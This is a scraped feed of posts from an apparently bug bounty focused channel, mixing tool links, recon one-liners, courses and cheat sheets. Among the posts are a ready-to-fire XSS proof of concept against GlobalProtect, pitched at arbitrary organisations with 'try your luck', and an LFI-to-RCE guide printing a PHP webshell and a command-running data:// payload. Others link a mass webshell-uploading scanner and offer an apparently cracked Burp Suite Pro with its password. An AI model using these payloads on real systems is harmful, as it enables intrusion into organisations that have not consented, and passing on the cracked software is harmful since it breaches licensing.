2246
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
The recently disclosed XSS vulnerability in GlobalProtect (CVE-2025-0133) has affected hundreds of thousands of organizations worldwide — including thousands of bug bounty programs.
Try your luck by running this PoC /ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=<svg xmlns%3D"http%3A%2F%http://2Fwww.w3.org%2F2000%2Fsvg"><script>prompt("XSS")<%2Fscript><%2Fsvg>&domain=(empty_domain)&computer=computer
⚡CloakQuest3r - Uncover the true IP address of websites safeguarded by Cloudflare & Others
✅https://github.com/spyboy-productions/CloakQuest3r
guys after a long time i created a web app to play a suduko game
check out the repo and let me know
https://github.com/Addy-shetty/Suduko_to_play
HTB- ALL modules
Run:
python -m http.server 8000
🚀 Exciting News for #InfoSec & #BugBounty! 🛡
ProxSec v1.0.0 is out—an open-source extension for security pros! 🔥
✅ Proxy management
✅ Scope validation
✅ Program tracking
✅ Lightweight & private
Open-Source : https://github.com/aacle/ProxSec
Feedback welcome! 💬
https://pocorexp.nsa.im
lists all CVEs and public exploit
a simple dork that find every VDP in worl wide 😎
body="/responsible-disclosure" || body="/.well-known/security.txt") && port="443"
credit: http://x.com/darkshadow2bd
▶️Fresh BB Target - https://lormadetails.com/.well-known/security.txt
Читать полностью…
🔖Sorting subdomains into different files based on status code, server type, and vhosts.
cat domains.txt | httpx -server -vhost -sc > httpx-output.txt
awk '{gsub(/\x1b\[[0-9;]*m/, ""); status=$2; gsub(/[\[\]]/, "", status); server=$3; gsub(/[\[\]]/, "", server); safe_server=server; gsub(/[^a-zA-Z0-9_-]/, "_", safe_server); main_server=server; sub(/\/.*/, "", main_server); gsub(/[^a-zA-Z0-9_-]/, "_", main_server); vhost=$4; gsub(/[\[\]]/, "", vhost); if (server=="") print > "server-not-specified.txt"; else {print > (safe_server ".txt"); print > (main_server ".txt");} if (vhost=="vhost") print > "vhost.txt";}' httpx-output.txt
🔐 Breaking APIs: An Offensive API Pentesting Course
🎓 Course Content:
1. 🚀 Introduction
2. 📚 What is API Pentesting?
3. 🧪 Lab Setup
4. 🛠 Tools Setup
5. 🔍 Active and Passive Recon
6. 🔑 API Endpoint Analysis
7. ⚔️ BOLA
8. 🔓 Broken Authentication
9. 🛡 BFLA
10. 🕵️ SSRF
11. 📊 Excessive Data Exposure
12. 📈 Lack of Resource and Rate Limiting
13. 📦 Mass Assignment
14. 💉 Injection Attacks
15. 🏗 Improper Asset Management
16. 🔧 Security Misconfigurations
17. 📝 Insufficient Logging and Monitoring
18. 🎁 Bonus Lecture
✅ Why Enroll?
- ⏰ 5+ hours of in-depth content, including labs.
- 🔬 Hands-on exercises to reinforce key concepts and techniques.
- 📝 Quizzes and tasks to ensure you master API pentesting skills.
🔗 Link :- https://www.udemy.com/course/breaking-apis-an-offensive-api-pentesting-course/?referralCode=F7408590E13C6D21428B
💵 30-day money-back guarantee!
🧑🎓Keep Learning and Exploring
https://gowsundar.gitbook.io/book-of-bugbounty-tips
Читать полностью…
Burp Suite Professional v2024.5 + BurpBounty_Pro 2.8.0 + JDK 22
pass: 311138
README (en+ru) inside, plz read it before run BS.
Happy Hacking! 🥳
Run with Java SE JDK 22
A simple Python script to scan multiple targets for SQL Injection via HTTP headers like User-Agent, X-Forwarded-For, and X-Client-IP.
https://github.com/ifconfig-me/SQLi-Scanner
🚨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.
✅https://github.com/ill-deed/CVE-2025-34085-Multi-target
Penetration Testing with KALI and More All You Need to Know full guide
Duration:- 7 Hour
https://beerus11.medium.com/redis-internals-and-use-cases-the-definitive-guide-4bab3b7faf11
Читать полностью…
This is my suggestion on who ever needs to start in cybersecurity a 6month plan
Читать полностью…
https://github.com/kh4sh3i/Application-Security-Interview-Questions
Читать полностью…
Spotlight on taiphung217: Five-Month Climb to Huntr Leaderboard Glory
https://blog.huntr.com/spotlight-taiphung217-five-month-huntr-leaderboard-climb
guys this is an updating blog of cipherops if u need anything you guys can go and check here if possible i would like to update 2vice in a week
https://cipherops.gitbook.io/bug-bounty-notes
🔥 Mastering PHP Filters & Wrappers for LFI to RCE — FULL GUIDE
⚠️Most hackers stop at reading logs.
The elite use PHP wrappers to turn LFI into remote code execution.
This post is your all-in-one breakdown of how PHP wrappers work and how to exploit them like a pro. 👇
🎯 Why PHP Wrappers Matter in Bug Bounty
PHP provides built-in stream wrappers — special protocols to access I/O sources like files, memory, input/output streams, and even compressed/encrypted data.
php://filter/read=convert.base64-encode/resource=index
http://<IP>/index.php?file=php://filter/read=convert.base64-encode/resource=config
echo 'PD9waHAK...base64...' | base64 -d
<?php include('php://input'); ?>POST /index.php
<?php system($_GET['cmd']); ?>
include('expect://ls');include('data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==');zip://path/to/archive.zip#file_inside.txt
phar://path/to/phar_file
ffuf -w /opt/seclists/.../directory-list.txt -u http://<IP>/FUZZ.php
?file=config
?file=php://filter/read=convert.base64-encode/resource=config
echo 'base64-encoded-content' | base64 -d
https://soltanali0.medium.com/bypassing-origin-checks-using-trailing-dot-trick-a65007041d3a
http://GitBook_s.t.me
↳ Nuclei template to find outdated software:
id: outdated-software-detectioninfo:
name: Outdated Software Detection
author: pentester_x
severity: low
description: |
Detects outdated software versions by extracting version information from headers, scripts, and stylesheets.reference:
- https://nvd.nist.gov/vuln/search
- https://www.cvedetails.com
- https://www.exploit-db.com
- https://cve.mitre.orgtags: outdated,software,vulnerable,version,cverequests:
- method: GET
path:
- "{{BaseURL}}" - "{{BaseURL}}/version" - "{{BaseURL}}/status" - "{{BaseURL}}/server-info" - "{{BaseURL}}/api/version" - "{{BaseURL}}/v1/info" - "{{BaseURL}}/robots.txt"matchers:- type: regex
part: header
regex:
- '(?i)(Server|X-Powered-By|Version):.*?(Apache|nginx|PHP|WordPress|Tomcat|MySQL)/(\d+\.\d+\.\d+)'
- '(?i)(\b\d+\.\d+\.\d+\b)'extractors:
- type: regex
name: software_version
group: 3
part: header
regex:
- '(?i)(Server|X-Powered-By|Version):.*?(Apache|nginx|PHP|WordPress|Tomcat|MySQL)/(\d+\.\d+\.\d+)'
- type: regex
name: software_version
regex:
- '(?i)v?(?:ersion)?[\s:]*(\d+\.\d+\.\d+)'- method: GET
path:
- "{{BaseURL}}/static/main.js" - "{{BaseURL}}/css/styles.css" - "{{BaseURL}}/app/build.js" - "{{BaseURL}}/assets/scripts.js"matchers:- type: regex
regex:
- '(?i)v?\d+\.\d+\.\d+'
- '@version\s+\d+\.\d+\.\d+'extractors:
- type: regex
name: software_version
regex:
- '(?i)v?(\d+\.\d+\.\d+)'
- '@version\s+(\d+\.\d+\.\d+)'
one of the best blog to use for bugbounty and make it more better with AI
if you guys liked it give me a reaction
https://blog.ethiack.com/blog/supercharging-bug-bounty-hunting-with-ai
🐲 Kali Linux Cheat Sheet.
➡Recon and Enumeration;
➡Python Local Web Server;
➡Mounting File Shares;
➡Basic FingerPrinting;
➡SNMP Enumeration;
➡DNS Zone Transfers;
➡DNSRecon;
➡HTTP / HTTPS Webserver Enumeration;
➡Packet Inspection;
➡Username Enumeration;
➡Passwords;
➡Brute Forcing Services;
➡Password Cracking;
➡Exploit Research;
➡Compiling Exploits;
➡SUID Binary;
➡TTY Shells;
➡Metasploit;
➡Networking;
➡IPv4;
➡ASCII Table Cheat Sheet;
➡Cisco IOS Commands.
➡️ https://github.com/NoorQureshi/kali-linux-cheatsheet
➡Linux Network Commands Cheat Sheet;
➡RedHat Linux Commands Cheat Sheet;
➡Linux Ubuntu Commands Cheat Sheet;
➡Oracle Linux Cheat Sheet;
➡Centos Cheat Sheet;
➡Arch Linux Cheat Sheet;
➡Basic Linux Commands Cheat Sheet;
➡Advanced Linux Commands Cheat Sheet;
➡Linux Commands Cheat Sheet for DevOps;
➡Kali Linux Commands Cheat Sheet;
➡Linux Network Commands Cheat Sheet;
➡Linux to Windows Commands Cheat Sheet.
●▬۩❁ @geeekgirl ❁۩▬●
🌀Download all bug bounty programs domains in scope items 🎯
😉Get a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more – all in one place!💥
👇🏼Step 1: Download the domains.txt file
📂step 2: Extract only main/root domains
`cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains`
📂Step 3: Extract all IP addresses:
`grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt`
Don't forget to give reactions❤️
Challenge: Identify 2 security risks and improve error handling.
Читать полностью…